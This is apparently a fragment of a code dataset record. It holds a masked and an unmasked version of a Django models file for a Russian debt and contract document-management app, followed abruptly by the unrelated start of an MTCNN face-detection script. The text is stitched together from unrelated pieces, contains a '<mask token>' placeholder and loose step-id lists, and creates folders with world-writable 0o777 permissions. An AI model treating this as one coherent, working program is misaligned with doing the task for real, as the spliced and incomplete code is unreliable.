related_name=\n 'normatives', verbose_name='Нормативы')\n\n def __str__(self):\n return self.name\n\n @property\n def print_norm_type(self):\n return NORM_TYPE[self.norm_type][1]\n\n\n class Meta:\n verbose_name_plural = 'Категории нормативов'\n\n\nclass Normative(models.Model):\n \"\"\" Класс норматива \"\"\"\n since_date = models.DateField('Дата начала действия норматива', null=\n True, blank=True)\n up_to_date = models.DateField('Дата окончания действия норматива', null\n =True, blank=True)\n value = models.FloatField('Значение норматива (год.)', null=True, blank\n =True)\n\n def __str__(self):\n return (f'Норматив: {self.value}/год.,' +\n f\" действующий с {self.since_date.strftime('%d.%m.%Y')}\" +\n f\" по {self.up_to_date.strftime('%d.%m.%Y')}\")\n\n\n class Meta:\n verbose_name_plural = 'Нормативы'\n\n\nclass Contract(models.Model):\n \"\"\" Класс контракта. Нужен что бы получать уникальный номер контракта.\n Сохраняет дату когда был создан, для корректной генерации строкового\n представления.\n \"\"\"\n date_field = models.DateField(auto_now_add=True)\n\n def __str__(self):\n return f'{self.pk:06}-{self.date_field.year}/ТКО/01'\n\n\n class Meta:\n verbose_name_plural = 'Сгенерированые номера договоров'\n\n\nclass ContractNumberClass(models.Model):\n \"\"\" Модель класса прокси для соединения класса документа и контрагента.\n\n Принимает на вход необязательные параметры:\n new - определяем, надо генерировать новый номер или есть\n старый. Булево значение. True = генерируем;\n exist_number - существующий номер договора. Строка;\n\n У класса есть такие поля как:\n is_generated - хранит булево значение. Определяет был ли сгенерирован\n номер или взят из внешних источников;\n contract_obj - объект модели самого номера контракта;\n contract_exist_number - существующий номер контракта. 
Пустая строка,\n если мы сгенерировали новый номер;\n contract_number - возвращает строковое представление номера, независимо\n от того, сгенерирован код или получен из внешнего\n источника.\n \"\"\"\n is_generated = models.BooleanField(default=False)\n contract_obj = models.OneToOneField(Contract, on_delete=models.CASCADE,\n null=True, blank=True)\n contract_exist_number = models.CharField(default='', max_length=255,\n null=True, blank=True)\n\n @classmethod\n def create(cls, new: bool=False, exist_number: str=''):\n contract_num_obj = cls(is_generated=new)\n if new:\n contract_num_obj.contract_obj = Contract.objects.create()\n else:\n contract_num_obj.contract_exist_number = exist_number\n contract_num_obj.save()\n return contract_num_obj\n\n @property\n def contract_number(self):\n if self.is_generated:\n return str(self.contract_obj)\n else:\n return self.contract_exist_number\n\n def __str__(self):\n return self.contract_number\n\n\n class Meta:\n verbose_name_plural = 'Номера договоров'\n\n\nclass SyncUniqueNumber(models.Model):\n\n def __str__(self):\n return f'{self.pk:08}/01'\n\n\n class Meta:\n verbose_name_plural = 'Номера документов'\n\n\nclass CityModel(models.Model):\n name = models.CharField('Город', max_length=255, null=True, blank=True)\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n verbose_name_plural = 'Города'\n\n\nclass TemplateModel(models.Model):\n template_path = models.CharField('Путь до шаблона', max_length=255)\n city = models.ForeignKey(CityModel, on_delete=models.CASCADE)\n contragent_type = models.IntegerField('Тип контрагента', choices=\n KLASS_TYPES, default=0)\n document_type = models.ForeignKey('DocumentTypeModel', verbose_name=\n 'Тип документа', on_delete=models.CASCADE)\n\n def __str__(self):\n return (\n f'{str(self.document_type)}| {KLASS_TYPES[self.contragent_type][1]}|{self.city}'\n )\n\n\n class Meta:\n verbose_name_plural = 'Шаблоны документов'\n\n\nclass DocumentTypeModel(models.Model):\n doc_type = models.CharField('Тип документа', max_length=255, null=True,\n blank=True)\n is_pack = models.BooleanField('Пакет документов', default=False)\n\n def __str__(self):\n return self.doc_type\n\n\n class Meta:\n verbose_name_plural = 'Типы документов'\n\n\nclass State(models.Model):\n name_state = models.CharField('Состояние', max_length=255)\n departments = models.ManyToManyField('yellowbird.Department',\n verbose_name='Отделы', related_name='available_states')\n is_initial_state = models.BooleanField('Начальное состояние', default=False\n )\n is_final_state = models.BooleanField('Конечное состояние', default=False)\n\n def get_linked_events(self):\n return Event.objects.filter(from_state=self.id)\n\n def _is_dept_permitted(self, department):\n return department in self.departments.all()\n\n def is_permitted(self, user):\n return user.is_superuser or user.is_staff or self._is_dept_permitted(\n user.department)\n\n def __str__(self):\n return self.name_state\n\n\n class Meta:\n verbose_name_plural = 'Состояния'\n\n\nclass Event(models.Model):\n name_event = models.CharField('Событие', max_length=255)\n from_state = models.ForeignKey(State, on_delete=models.CASCADE,\n verbose_name='Исходное состояние', blank=True, null=True,\n related_name='begin_states')\n to_state = models.ForeignKey(State, on_delete=models.CASCADE,\n verbose_name='Конечное состояние', blank=True, null=True,\n related_name='end_states')\n is_move_backward = models.BooleanField('Двигаемся обратно назад',\n default=False)\n\n def __str__(self):\n return self.name_event\n\n\n 
class Meta:\n verbose_name_plural = 'События'\n\n\nclass ListStrategy(ABC):\n\n @abstractmethod\n def execute_list_strategy(self, user):\n raise NotImplementedError\n\n @abstractmethod\n def execute_single_strategy(self, pk, user):\n raise NotImplementedError\n\n\nclass OnlyEmptyRecords(ListStrategy):\n\n def execute_list_strategy(self, user):\n contragents = Contragent.objects.all()\n return [c for c in contragents if not c.active_package]\n\n def execute_single_strategy(self, pk, user):\n try:\n res = Contragent.objects.get(pk=pk)\n return res if not res.active_package else None\n except Contragent.DoesNotExist:\n return None\n\n\nclass OnlyMyRecordsStrategy(ListStrategy):\n\n def execute_list_strategy(self, user):\n contragents = Contragent.objects.filter(current_user__contain=user)\n return contragents\n\n def execute_single_strategy(self, pk, user):\n try:\n return Contragent.objects.get(pk=pk, current_user__contain=user)\n except Contragent.DoesNotExist:\n return None\n\n\nclass AllRecords(ListStrategy):\n\n def execute_list_strategy(self, user):\n contragents = Contragent.objects.all()\n return contragents\n\n def execute_single_strategy(self, pk, user):\n try:\n return Contragent.objects.get(pk=pk)\n except Contragent.DoesNotExist:\n return None\n\n\nclass AllInDepartmentRecords(ListStrategy):\n\n def execute_list_strategy(self, user):\n res = list()\n contragents = Contragent.objects.all()\n for c in contragents:\n tmp_pack = c.get_active_package()\n if tmp_pack:\n tmp_state = tmp_pack.package_state\n if tmp_state:\n if tmp_state.is_permitted(user.department):\n res.append(c)\n else:\n res.append(c)\n else:\n res.append(c)\n return res\n\n def execute_single_strategy(self, pk, user):\n try:\n contragent = Contragent.objects.get(pk=pk)\n tmp_pack = contragent.get_active_package()\n if tmp_pack:\n tmp_list = [(c.department == user.department) for c in\n contragent.current_user]\n if any(tmp_list):\n return contragent\n return None\n return contragent\n except Contragent.DoesNotExist:\n return None\n\n\nclass MyAndEmptyRecordsStrategy(ListStrategy):\n\n def execute_list_strategy(self, user):\n res = list()\n contragents = Contragent.objects.all()\n for c in contragents:\n tmp_pack = c.get_active_package()\n if tmp_pack:\n tmp_state = tmp_pack.package_state\n if tmp_state:\n if tmp_state.is_permitted(user) and user in c.current_user:\n res.append(c)\n else:\n res.append(c)\n else:\n res.append(c)\n return res\n\n def execute_single_strategy(self, pk, user):\n try:\n contragent = Contragent.objects.get(pk=pk)\n tmp_pack = contragent.get_active_package()\n if tmp_pack:\n tmp_state = tmp_pack.package_state\n if tmp_state:\n if tmp_state.is_permitted(user\n ) and user in contragent.current_user:\n return contragent\n return contragent\n except Contragent.DoesNotExist:\n return None\n\n\n<mask token>\n",
"step-5": "import datetime\nimport os\nimport uuid\nfrom abc import ABC, abstractmethod\n\nfrom django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.contrib.contenttypes.fields import (GenericForeignKey,\n GenericRelation)\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db import models\n\nfrom bluebird.templatetags.template_extra_filters import (plur_form,\nproper_last_name)\nfrom bluebird.tasks import calc_create_gen_async\n\nfrom django_q.tasks import async_task\n\nfrom .snippets import str_add_app, KLASS_TYPES, DOC_TYPE\n\n\nNORM_TYPE = [\n (0, '1 м2 общей площади'),\n (1, '1 место'),\n (2, '1 человек'),\n]\n\n\nPOST_TYPE = [\n (0, 'Клиент-менеджер'),\n (1, 'Старший менеджер по работе с ЮЛ'),\n (2, 'Менеджер'),\n]\n\n\nclass Adress(models.Model):\n state = models.CharField(verbose_name=\"Область\", max_length=255)\n city = models.CharField(verbose_name=\"Город\", max_length=255)\n street = models.CharField(verbose_name=\"Улица\", max_length=255)\n block = models.CharField(verbose_name=\"Номер дома\", max_length=10)\n\n\nclass ContragentClass(models.Model):\n name = models.CharField('Наименование', max_length=255)\n\n\nclass Contragent(models.Model):\n \"\"\"\n Класс Контрагента.\n\n \"\"\"\n # klass = models.ForeignKey(ContragentClass, on_delete=models.CASCADE)\n klass = models.IntegerField(choices=KLASS_TYPES, default=0)\n excell_name = models.CharField('Наименование контрагента (из Excell)',\n max_length=255)\n dadata_name = models.CharField('Наименование контрагента (из Dadata)',\n max_length=255, blank=True, null=True)\n debt = models.FloatField('Сумма задолжности', default=0.00)\n debt_period = models.IntegerField('Количество неоплаченных периодов, мес.',\n blank=True, null=True)\n inn = models.BigIntegerField('ИНН контрагента', blank=True, null=True)\n ogrn = models.BigIntegerField('ОГРН контрагента', blank=True, null=True)\n kpp = models.BigIntegerField('КПП контрагента', blank=True, null=True)\n\n rs = models.CharField('Р/с', max_length=255, blank=True, null=True)\n ks = models.CharField('К/с', max_length=255, blank=True, null=True)\n bank = models.CharField('Наименование банка', max_length=255, blank=True,\n null=True)\n bik = models.CharField('БИК', max_length=255, blank=True, null=True)\n opf = models.CharField('ОПФ', max_length=255, blank=True, null=True)\n\n director_status = models.CharField('Директор (физ. лицо либо юр. 
лицо)',\n max_length=255, blank=True, null=True)\n director_name = models.CharField('Имя либо иное наименование директора',\n max_length=255, blank=True, null=True)\n creation_date = models.DateField('Дата создания контрагента (юл)',\n blank=True, null=True)\n is_func = models.BooleanField('Признак активности контрагента',\n default=True)\n okved = models.CharField('ОКВЭД',\n max_length=255, blank=True, null=True)\n\n # TODO REWORK THIS AREA\n physical_address = models.CharField('Физический адресс',\n max_length=255)\n legal_address = models.CharField('Юридический адресс',\n max_length=255, blank=True, null=True)\n # END OF REWORK\n\n norm_value = models.ForeignKey('NormativeCategory',\n related_name='normatives',\n on_delete=models.CASCADE,\n blank=True, null=True)\n stat_value = models.FloatField('Показатель', blank=True, null=True)\n contract_accept_date = models.DateField(\n 'Дата начала оказания услуг',\n default=datetime.date.fromisoformat('2018-07-01'),\n blank=True, null=True\n )\n current_date = models.DateField('Конечная дата оказания услуг',\n default=datetime.date.today, blank=True,\n null=True)\n number_contract = models.OneToOneField('ContractNumberClass',\n on_delete=models.CASCADE,\n max_length=255,\n blank=True, null=True)\n current_contract_date = models.DateField('Дата заключения договора',\n blank=True, null=True)\n signed_user = models.ForeignKey('SignUser', blank=True, null=True,\n on_delete=models.CASCADE,\n related_name='signed')\n\n platform = models.IntegerField('№ площадки',\n blank=True, null=True)\n\n judge_link = models.CharField(verbose_name=\"\", max_length=255,\n blank=True, null=True)\n fss_link = models.CharField(verbose_name=\"\", max_length=255,\n blank=True, null=True)\n\n personal_number = models.CharField(verbose_name=\"Лицевой счет\",\n max_length=255, blank=True, null=True)\n\n passport_number = models.CharField(verbose_name=\"Номер паспорта\",\n max_length=15, blank=True, null=True)\n passport_date = models.DateField(verbose_name=\"Дата выдачи пасспорта\",\n blank=True, null=True)\n passport_origin = models.CharField(verbose_name=\"Кем выдан пасспорт\",\n max_length=15, blank=True, null=True)\n snils = models.CharField(verbose_name=\"СНИЛС\",\n max_length=15, blank=True, null=True)\n\n def create_package_and_folder(self):\n self.check_and_create_parent_folder()\n if not os.path.isdir(self.get_str_as_path()):\n os.mkdir(self.get_str_as_path(), mode=0o777)\n\n def check_and_create_parent_folder(self):\n if not os.path.isdir(os.path.join(settings.MEDIA_ROOT,\n KLASS_TYPES[self.klass][1])):\n os.mkdir(os.path.join(settings.MEDIA_ROOT,\n KLASS_TYPES[self.klass][1]), mode=0o777)\n\n def get_str_as_path(self):\n return os.path.join(os.path.join(settings.MEDIA_ROOT,\n KLASS_TYPES[self.klass][1]),\n f'{self.pk} {self.excell_name}')\n\n @property\n def current_user(self):\n package = self.get_active_package()\n if package:\n res = [user for user in package.package_users.all(\n ) if package.package_state.is_permitted(user)]\n return res\n return None\n\n @current_user.setter\n def current_user(self, user):\n package = self.get_active_package()\n if package and not package.is_user_in_package(user, True):\n package.package_users.add(user)\n package.save()\n\n @property\n def active_package(self):\n return self.get_active_package()\n\n def get_all_packages(self):\n return DocumentsPackage.objects.filter(contragent=self.pk) or None\n\n def get_active_package(self):\n res = DocumentsPackage.get_active_package(self)\n return res\n\n def reset_debt(self):\n 
self.debt = 0\n self.debt_period = 0\n self.save()\n\n def __str__(self):\n return f'{self.excell_name}'\n\n class Meta:\n verbose_name_plural = \"Контрагенты\"\n\n\nclass SignUser(models.Model):\n name = models.CharField('ФИО отвественного лица', max_length=255)\n document = models.IntegerField('Документ основания', choices=DOC_TYPE,\n default=0)\n position = models.IntegerField('Должность', choices=POST_TYPE,\n default=0)\n doc_number = models.CharField('Номер документа', max_length=255)\n doc_date = models.DateField('Дата начала действия документа')\n address = models.CharField('Адресс', max_length=255)\n city = models.ForeignKey('CityModel', on_delete=models.CASCADE,\n blank=True, null=True)\n tel_number = models.CharField('Телефон', max_length=255, default='')\n sign = models.ImageField('Подпись', upload_to='signs/',\n blank=True, null=True)\n\n def __str__(self):\n # return self.name\n return f\"{proper_last_name(self.name)}, {POST_TYPE[self.position][1]}\"\n\n def save(self, *args, **kwargs):\n instance = SignUser.objects.get(id=self.id)\n if self.sign != instance.sign and instance.sign:\n if os.path.exists(instance.sign.url):\n os.remove(instance.sign.url)\n super().save(*args, **kwargs)\n\n class Meta:\n verbose_name_plural = \"Отвественные лица с правом подписи\"\n\n\nclass Commentary(models.Model):\n user = models.ForeignKey(settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE, blank=True, null=True)\n commentary_text = models.TextField('Комментарий', blank=True, null=True)\n creation_date = models.DateTimeField('Дата создания', auto_now_add=True)\n\n content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n\n\nclass AbstractFileModel(models.Model):\n file_name = models.CharField('Название файла', max_length=255,\n null=True, blank=True)\n file_path = models.CharField('Путь', max_length=255, blank=True, null=True)\n creation_date = models.DateField('Дата создания файла',\n blank=True, null=True)\n\n # Подгрузка произвольного количества файлов\n content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n\n file_type = models.ForeignKey('DocumentTypeModel',\n on_delete=models.CASCADE)\n\n def delete(self, using=None, keep_parents=False):\n if os.path.exists(str_add_app(self.file_path)):\n os.remove(str_add_app(self.file_path))\n return super().delete(using=using, keep_parents=keep_parents)\n\n class Meta:\n abstract = True\n\n\nclass SingleFile(AbstractFileModel):\n\n def __str__(self):\n return str(self.file_type)\n\n class Meta:\n verbose_name_plural = \"Единичные файлы\"\n\n\nclass PackFile(AbstractFileModel):\n unique_number = models.ForeignKey('SyncUniqueNumber',\n on_delete=models.CASCADE,\n null=True, blank=True)\n\n class Meta:\n abstract = False\n verbose_name_plural = \"Фаилы набора\"\n\n def initialize_folder(self, path: str):\n if self.file_type:\n tmp_str_path = plur_form(self.file_type.doc_type)\n if not os.path.isdir(f'{path}/{tmp_str_path}/'):\n os.makedirs(f'{path}/{tmp_str_path}/')\n else:\n raise AttributeError()\n\n def get_files_path(self, package: 'DocumentsPackage'):\n tmp_path = package.get_save_path()\n self.initialize_folder(tmp_path)\n return os.path.join(tmp_path, f'{plur_form(self.file_type.doc_type)}/')\n\n\ndef other_files_directory_path(instance, filename):\n p = instance.content_object.get_save_path()\n 
return '{0}/прочие/{1}'.format(p, filename)\n\n\nclass OtherFile(AbstractFileModel):\n file_obj = models.FileField('Произвольные файлы',\n upload_to=other_files_directory_path,\n max_length=500)\n\n commentary = GenericRelation(Commentary, related_query_name='file')\n\n class Meta:\n verbose_name_plural = \"Прочие файлы\"\n\n\nclass ActExam(models.Model):\n FOLDER = 'Акт осмотра/'\n\n file_path = models.CharField('Путь', max_length=255, blank=True, null=True)\n file_name = models.CharField('Название файла', max_length=255,\n null=True, blank=True)\n\n @classmethod\n def initialize_folder(cls, path: str):\n tmp_path = f'{path}/{cls.FOLDER}'\n if not os.path.isdir(tmp_path):\n os.makedirs(tmp_path)\n\n @classmethod\n def get_files_path(cls, package: 'DocumentsPackage'):\n tmp_path = package.get_save_path()\n ActExam.initialize_folder(tmp_path)\n return os.path.join(tmp_path, cls.FOLDER)\n\n def clear_file(self):\n if os.path.exists(str_add_app(self.file_path)):\n os.remove(str_add_app(self.file_path))\n self.file_path = None\n self.file_name = None\n self.save()\n\n def delete(self, using=None, keep_parents=False):\n self.clear_file()\n return super().delete(using=using, keep_parents=keep_parents)\n\n\nclass DocumentsPackage(models.Model):\n \"\"\" Модель пакета документов.\n contragent - ID контрагента\n name_uuid - Уникальный ID пакета (каждый раз новый)\n is_active - Является ли пакет активным. Если True, то пакет в работе. Если\n False, то пакет закрыт.\n is_automatic - Создан ли пакет автоматически или пользователь может\n редактировать наборы файлов и некоторые характеристики. Если\n True, то нельзя подгружать свои договора и редактировать\n debt_plan. Если False, то редактирование возможно.\n creation_date - Дата создания пакета.\n debt_plan - Сумма долга. Если is_automatic == True, то значение не\n редактируется. Если is_automatic == False, то значение\n необходимо заполнить.\n debt_fact - Сумма долга по факту. Заполняется при сторнировании или оплате.\n tax_count - Госпошлина. Можно заполнять в любом случае.\n package_users - Все пользователи пакета, работавшие с ним.\n package_state - Состояние пакета.\n package_state_date - Дата изменения состояния пакета.\n single_files - Пакет одиночных документов. 
\n pack_files - Пакет наборов файлов.\n other_files - Произвольные файлы.\n commentary - Комментарии.\n \"\"\"\n contragent = models.ForeignKey(Contragent, on_delete=models.CASCADE,\n related_name='contragents',\n related_query_name='contragent',\n null=True, blank=True)\n name_uuid = models.CharField('Идентификатор пакета', max_length=255,\n default=uuid.uuid4, null=True, blank=True,\n editable=False)\n is_active = models.BooleanField('Активный пакет', default=True)\n is_automatic = models.BooleanField('Создан автоматически', default=True)\n creation_date = models.DateField('Дата создания пакета', auto_now_add=True)\n\n debt_plan = models.FloatField('Сумма задолжности (плановая)',\n default=0.00)\n debt_fact = models.FloatField('Сумма задолжности (фактическая)',\n default=0.00)\n tax_count = models.FloatField('Госпошлина', default=0.00)\n\n package_users = models.ManyToManyField(settings.AUTH_USER_MODEL,\n related_name='packages')\n\n package_state = models.ForeignKey('State', on_delete=models.CASCADE,\n null=True, blank=True)\n\n package_state_date = models.DateField('Дата последнего действия',\n null=True, blank=True)\n\n single_files = GenericRelation(SingleFile)\n\n pack_files = GenericRelation(PackFile)\n\n other_files = GenericRelation(OtherFile)\n\n commentary = GenericRelation(Commentary, related_query_name='package')\n \n act = models.ForeignKey(ActExam, on_delete=models.CASCADE,\n null=True, blank=True)\n\n def __str__(self):\n return f'Пакет {self.name_uuid}'\n\n def get_save_path(self):\n if self.contragent:\n return os.path.join(self.contragent.get_str_as_path(),\n str(self.name_uuid))\n else:\n return f'{self.name_uuid}'\n\n @classmethod\n def get_active_package(cls, contragent: Contragent):\n try:\n res = cls.objects.get(contragent__id=contragent.pk, is_active=True)\n return res\n except ObjectDoesNotExist:\n return None\n\n def initialize_sub_folders(self):\n os.makedirs(str(self.get_save_path()), exist_ok=True)\n\n def is_user_in_package(self, user, use_department=False):\n users = self.package_users.all()\n if use_department:\n depts = [tmp_user.department for tmp_user in users]\n return (user.department in depts) or (user in users)\n return user in users\n\n def set_inactive(self):\n self.is_active = False\n self.save()\n\n def change_state_to(self, new_state, is_backward):\n self.package_state = new_state\n self.package_state_date = datetime.date.today()\n if not is_backward:\n async_task(calc_create_gen_async, self.contragent, self, False,\n group=self.name_uuid)\n # TODO Journal log here!\n self.save()\n\n class Meta:\n verbose_name_plural = \"Пакеты документов\"\n\n\nclass DocumentStateEntity(models.Model):\n documents = models.ManyToManyField('DocumentTypeModel',\n related_name='document_type')\n states = models.ForeignKey('State', related_name='states',\n on_delete=models.CASCADE,\n blank=True, null=True)\n template = models.ForeignKey('DocumentFileTemplate',\n on_delete=models.CASCADE,\n blank=True, null=True)\n\n\nclass DocumentFileTemplate(models.Model):\n contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)\n is_package = models.BooleanField('Набор файлов', default=False)\n\n def __str__(self):\n return KLASS_TYPES[self.contagent_type][1]\n\n class Meta:\n verbose_name_plural = \"Шаблоны файлов\"\n\n# class SingleFilesTemplate(models.Model):\n# contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)\n\n# def __str__(self):\n# return KLASS_TYPES[self.contagent_type][1]\n\n# class Meta:\n# verbose_name_plural = \"Шаблоны единичных 
файлов\"\n\n\n# class PackFilesTemplate(models.Model):\n# contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)\n# documents = models.ManyToManyField('DocumentTypeModel',\n# related_name='document_type_pack')\n\n# def __str__(self):\n# return KLASS_TYPES[self.contagent_type][1]\n\n# class Meta:\n# verbose_name_plural = \"Шаблоны наборов файлов\"\n\n\nclass NormativeCategory(models.Model):\n \"\"\" Класс Категории норматива \"\"\"\n name = models.CharField('Вид объекта',\n max_length=255)\n norm_type = models.IntegerField('Показатель расчета', default=0,\n choices=NORM_TYPE, blank=True, null=True)\n normative = models.ManyToManyField('Normative', related_name='normatives',\n verbose_name='Нормативы')\n\n def __str__(self):\n return self.name\n\n @property\n def print_norm_type(self):\n return NORM_TYPE[self.norm_type][1]\n\n class Meta:\n verbose_name_plural = \"Категории нормативов\"\n\n\nclass Normative(models.Model):\n \"\"\" Класс норматива \"\"\"\n since_date = models.DateField('Дата начала действия норматива',\n null=True, blank=True)\n up_to_date = models.DateField('Дата окончания действия норматива',\n null=True, blank=True)\n value = models.FloatField('Значение норматива (год.)',\n null=True, blank=True)\n\n def __str__(self):\n return (f'Норматив: {self.value}/год.,'\n + f' действующий с {self.since_date.strftime(\"%d.%m.%Y\")}'\n + f' по {self.up_to_date.strftime(\"%d.%m.%Y\")}')\n\n class Meta:\n verbose_name_plural = \"Нормативы\"\n\n\nclass Contract(models.Model):\n \"\"\" Класс контракта. Нужен что бы получать уникальный номер контракта.\n Сохраняет дату когда был создан, для корректной генерации строкового\n представления.\n \"\"\"\n date_field = models.DateField(auto_now_add=True)\n\n def __str__(self):\n return f'{self.pk:06}-{(self.date_field).year}/ТКО/01'\n\n class Meta:\n verbose_name_plural = \"Сгенерированые номера договоров\"\n\n\nclass ContractNumberClass(models.Model):\n \"\"\" Модель класса прокси для соединения класса документа и контрагента.\n\n Принимает на вход необязательные параметры:\n new - определяем, надо генерировать новый номер или есть\n старый. Булево значение. True = генерируем;\n exist_number - существующий номер договора. Строка;\n\n У класса есть такие поля как:\n is_generated - хранит булево значение. Определяет был ли сгенерирован\n номер или взят из внешних источников;\n contract_obj - объект модели самого номера контракта;\n contract_exist_number - существующий номер контракта. 
Пустая строка,\n если мы сгенерировали новый номер;\n contract_number - возвращает строковое представление номера, независимо\n от того, сгенерирован код или получен из внешнего\n источника.\n \"\"\"\n is_generated = models.BooleanField(default=False)\n contract_obj = models.OneToOneField(Contract,\n on_delete=models.CASCADE,\n null=True, blank=True)\n contract_exist_number = models.CharField(default='',\n max_length=255,\n null=True, blank=True)\n\n @classmethod\n def create(cls, new: bool = False, exist_number: str = ''):\n contract_num_obj = cls(is_generated=new)\n if new:\n contract_num_obj.contract_obj = Contract.objects.create()\n else:\n contract_num_obj.contract_exist_number = exist_number\n contract_num_obj.save()\n return contract_num_obj\n\n @property\n def contract_number(self):\n if self.is_generated:\n return str(self.contract_obj)\n else:\n return self.contract_exist_number\n\n def __str__(self):\n return self.contract_number\n\n class Meta:\n verbose_name_plural = \"Номера договоров\"\n\n\nclass SyncUniqueNumber(models.Model):\n\n def __str__(self):\n return f'{self.pk:08}/01'\n\n class Meta:\n verbose_name_plural = \"Номера документов\"\n\n\nclass CityModel(models.Model):\n name = models.CharField('Город', max_length=255, null=True, blank=True)\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name_plural = \"Города\"\n\n\nclass TemplateModel(models.Model):\n template_path = models.CharField('Путь до шаблона', max_length=255)\n city = models.ForeignKey(CityModel, on_delete=models.CASCADE)\n contragent_type = models.IntegerField('Тип контрагента',\n choices=KLASS_TYPES, default=0)\n document_type = models.ForeignKey('DocumentTypeModel',\n verbose_name='Тип документа',\n on_delete=models.CASCADE)\n\n def __str__(self):\n return f'{str(self.document_type)}|\\\n {KLASS_TYPES[self.contragent_type][1]}|{self.city}'\n\n class Meta:\n verbose_name_plural = \"Шаблоны документов\"\n\n\nclass DocumentTypeModel(models.Model):\n doc_type = models.CharField('Тип документа', max_length=255,\n null=True, blank=True)\n is_pack = models.BooleanField('Пакет документов', default=False)\n\n def __str__(self):\n return self.doc_type\n\n class Meta:\n verbose_name_plural = \"Типы документов\"\n\n\n#########\n# State #\n#########\n\nclass State(models.Model):\n name_state = models.CharField('Состояние', max_length=255)\n departments = models.ManyToManyField('yellowbird.Department',\n verbose_name='Отделы',\n related_name='available_states')\n is_initial_state = models.BooleanField('Начальное состояние',\n default=False)\n is_final_state = models.BooleanField('Конечное состояние', default=False)\n\n def get_linked_events(self):\n return Event.objects.filter(from_state=self.id)\n\n def _is_dept_permitted(self, department):\n return department in self.departments.all()\n\n def is_permitted(self, user):\n return (user.is_superuser or user.is_staff\n or self._is_dept_permitted(user.department))\n\n def __str__(self):\n return self.name_state\n\n class Meta:\n verbose_name_plural = 'Состояния'\n\n\nclass Event(models.Model):\n name_event = models.CharField('Событие', max_length=255)\n from_state = models.ForeignKey(State, on_delete=models.CASCADE,\n verbose_name='Исходное состояние',\n blank=True, null=True,\n related_name='begin_states')\n to_state = models.ForeignKey(State, on_delete=models.CASCADE,\n verbose_name='Конечное состояние',\n blank=True, null=True,\n related_name='end_states')\n is_move_backward = models.BooleanField('Двигаемся обратно назад',\n default=False)\n\n def 
__str__(self):\n return self.name_event\n\n class Meta:\n verbose_name_plural = 'События'\n\n##############\n# Strategies #\n##############\n\n\nclass ListStrategy(ABC):\n\n @abstractmethod\n def execute_list_strategy(self, user):\n raise NotImplementedError\n\n @abstractmethod\n def execute_single_strategy(self, pk, user):\n raise NotImplementedError\n\n\nclass OnlyEmptyRecords(ListStrategy):\n def execute_list_strategy(self, user):\n contragents = Contragent.objects.all()\n return [c for c in contragents if not c.active_package]\n\n def execute_single_strategy(self, pk, user):\n try:\n res = Contragent.objects.get(pk=pk)\n return res if (not res.active_package) else None\n except Contragent.DoesNotExist:\n return None\n\n\nclass OnlyMyRecordsStrategy(ListStrategy):\n\n def execute_list_strategy(self, user):\n contragents = Contragent.objects.filter(current_user__contain=user)\n return contragents\n\n def execute_single_strategy(self, pk, user):\n try:\n return Contragent.objects.get(pk=pk, current_user__contain=user)\n except Contragent.DoesNotExist:\n return None\n\n\nclass AllRecords(ListStrategy):\n def execute_list_strategy(self, user):\n contragents = Contragent.objects.all()\n return contragents\n\n def execute_single_strategy(self, pk, user):\n try:\n return Contragent.objects.get(pk=pk)\n except Contragent.DoesNotExist:\n return None\n\n\nclass AllInDepartmentRecords(ListStrategy):\n def execute_list_strategy(self, user):\n res = list()\n contragents = Contragent.objects.all()\n for c in contragents:\n tmp_pack = c.get_active_package()\n if tmp_pack:\n tmp_state = tmp_pack.package_state\n if tmp_state:\n if tmp_state.is_permitted(user.department):\n res.append(c)\n else:\n res.append(c)\n else:\n res.append(c)\n return res\n\n def execute_single_strategy(self, pk, user):\n try:\n contragent = Contragent.objects.get(pk=pk)\n tmp_pack = contragent.get_active_package()\n if tmp_pack:\n tmp_list = [c.department == user.department\n for c in contragent.current_user]\n if any(tmp_list):\n return contragent\n return None\n return contragent\n except Contragent.DoesNotExist:\n return None\n\n\nclass MyAndEmptyRecordsStrategy(ListStrategy):\n\n def execute_list_strategy(self, user):\n res = list()\n contragents = Contragent.objects.all()\n for c in contragents:\n tmp_pack = c.get_active_package()\n if tmp_pack:\n tmp_state = tmp_pack.package_state\n if tmp_state:\n if tmp_state.is_permitted(user) and (\n user in c.current_user):\n res.append(c)\n else:\n res.append(c)\n else:\n res.append(c)\n return res\n\n def execute_single_strategy(self, pk, user):\n try:\n contragent = Contragent.objects.get(pk=pk)\n tmp_pack = contragent.get_active_package()\n if tmp_pack:\n tmp_state = tmp_pack.package_state\n if tmp_state:\n if tmp_state.is_permitted(user) and (\n user in contragent.current_user):\n return contragent\n return contragent\n except Contragent.DoesNotExist:\n return None\n\n\nSTRATEGIES_LIST = ['Мои записи и пустые', 'Все по отделу', 'Все',\n 'Только мои записи', 'Только пустые записи']\n\nSTRATEGIES_TUPLES = list(enumerate(STRATEGIES_LIST))\n\nSTRATEGIES_FUNCTIONS = [MyAndEmptyRecordsStrategy, AllInDepartmentRecords,\n AllRecords, OnlyMyRecordsStrategy, OnlyEmptyRecords]\n\nSTRATEGIES = dict(zip(STRATEGIES_LIST, STRATEGIES_FUNCTIONS))\n\nZIP_FILES_ACTIONS = {\n 0: \"Скачать весь пакет\",\n 1: \"Скачать основные файлы\",\n 2: \"Скачать акты\",\n 3: \"Скачать счета\",\n 4: \"Скачать счета фактуры\",\n 5: \"Скачать прочие файлы\",\n}\n",
"step-ids": [
76,
93,
95,
98,
116
]
}
|
[
76,
93,
95,
98,
116
] |
# coding: utf-8
import sys
sys.path.extend(['detection', 'train'])
# from detection folder
from MtcnnDetector import MtcnnDetector
from detector import Detector
from fcn_detector import FcnDetector
# from train folder
from model_factory import P_Net, R_Net, O_Net
import config as config
from preprocess.utils import iou
import cv2
import os
from os.path import join, split
import numpy as np
from tqdm import tqdm
# test_mode = config.test_mode
test_mode = 'ONet'
thresh = [0.6, 0.7, 0.9]
min_face_size = 24
stride = 2
detectors = [None, None, None]
scale_factor = 0.79
